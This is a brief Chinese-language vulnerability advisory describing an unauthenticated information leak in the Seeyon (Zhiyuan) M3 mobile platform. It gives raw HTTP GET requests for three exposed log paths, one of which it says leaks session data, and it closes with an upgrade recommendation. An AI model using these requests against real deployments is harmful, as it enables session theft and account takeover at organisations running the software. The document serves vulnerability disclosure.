免责

只为学习与交流，若利用做一切违法乱纪的事与本人无关

漏洞描述

致远M3是一个企业移动业务管理平台，全面覆盖各种工作场景，通过智能化的办公和业务场景融合，为企业构建新一代的移动智能工作方式

漏洞原理

/mobile_portal/logs/autoLogin.log
/mobile_portal/logs/app.log
/mobile_portal/logs/requset.log
接口处存在存在信息泄露

影响版本

不详

漏洞复现

进行访问泄露接口

GET /mobile_portal/logs/autoLogin.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

可以看到session泄露

GET /mobile_portal/logs/app.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

GET /mobile_portal/logs/requset.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 2

修复方法

官方已更新补丁，请升级至最新版本。